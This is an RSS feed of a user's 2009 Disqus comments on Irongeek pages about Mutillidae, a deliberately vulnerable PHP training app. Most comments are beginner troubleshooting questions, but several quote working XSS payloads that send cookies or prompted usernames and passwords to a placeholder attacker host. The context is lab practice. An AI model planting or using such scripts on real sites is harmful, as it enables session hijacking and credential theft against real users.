<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title>Disqus - Latest Comments for Yaggi</title><link>http://disqus.com/by/Yaggi/</link><description></description><atom:link href="http://disqus.com/Yaggi/comments.rss" rel="self"></atom:link><language>en</language><lastBuildDate>Thu, 24 Sep 2009 05:37:20 -0000</lastBuildDate><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284291</link><description>&lt;p&gt;My question is that when using Password Con XSS script, there is no pop-up box that will ask the username and password&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 05:37:20 -0000</pubDate></item><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284182</link><description>&lt;p&gt;Correction&lt;br&gt;Using this script below, the attackers machine is able to gather the cookie information&lt;br&gt;Cookie Stealing:&lt;br&gt;&amp;lt;script&amp;gt; new Image().src="http://attacker_IP/Mutillidae/catch.php?cookie="+encodeURI(document.cookie); &amp;lt;/script&amp;gt;&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 05:28:36 -0000</pubDate></item><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284162</link><description>&lt;p&gt;Using this script below, the attackers machine is able to gather the cookie information&lt;br&gt;Cookie Stealing:&lt;br&gt;&amp;lt;script&amp;gt; new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); &amp;lt;/script&amp;gt;&lt;/p&gt;&lt;p&gt;but on this script Password Con XSS, when I view the log of everyone there was no event or pop-up box, I mean that in the tutorial there was a pop-up box asking us the username and password then the attacker will get the cookie&lt;br&gt;&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 05:27:43 -0000</pubDate></item><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17284027</link><description>&lt;p&gt;In the attacker machines, I setup the same like the target (but leave the httpd.conf default)&lt;br&gt;I put the Mutillidae in c:\xamp\htdocs\Mutillidae; so I change the script some thing like below...No Box has pop-up&lt;/p&gt;&lt;p&gt;Password Con XSS:&lt;br&gt;&amp;lt;script&amp;gt; &lt;br&gt;username=prompt('Please enter your username',' '); &lt;br&gt;password=prompt('Please enter your password',' ');&lt;br&gt; document.write("&amp;lt;img src="\"http://attackers_IP/Mutillidae/catch.php?username="+username+"&amp;amp;amp;password="+password+"\""&amp;gt;");&lt;br&gt; &amp;lt;/script&amp;gt;&lt;/p&gt;&lt;p&gt;Please help&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 05:21:09 -0000</pubDate></item><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17283948</link><description>&lt;p&gt;There were no images, should I download it? where?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 05:16:57 -0000</pubDate></item><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17283403</link><description>&lt;p&gt;I have trouble doing the test, In the Mutillidae file there are no images like making the clippy pop-up and password con did not give the pop-up box and the Form.&lt;br&gt;Do we have do download all the images? Sorry for this noob question&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 04:42:33 -0000</pubDate></item><item><title>Re: OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like 
Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File 
Execution/RFI, Insecure Direct Object Reference and ...</title><link>http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville#comment-17282217</link><description>&lt;p&gt;HI,&lt;/p&gt;&lt;p&gt;Using the password con: There is no box pop-up to ask the password and username, is this another image?&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Thu, 24 Sep 2009 03:30:19 -0000</pubDate></item><item><title>Re: Mutillidae: A Deliberately Vulnerable Set Of PHP Script That Implement 
The OWASP Top 10</title><link>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10#comment-17210758</link><description>&lt;p&gt;Great Stuff, I wonder if you will be posting a video how to audit,attack,exploit Mutillidae from the backtrack's W3af framework&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Yaggi</dc:creator><pubDate>Wed, 23 Sep 2009 06:18:24 -0000</pubDate></item></channel></rss>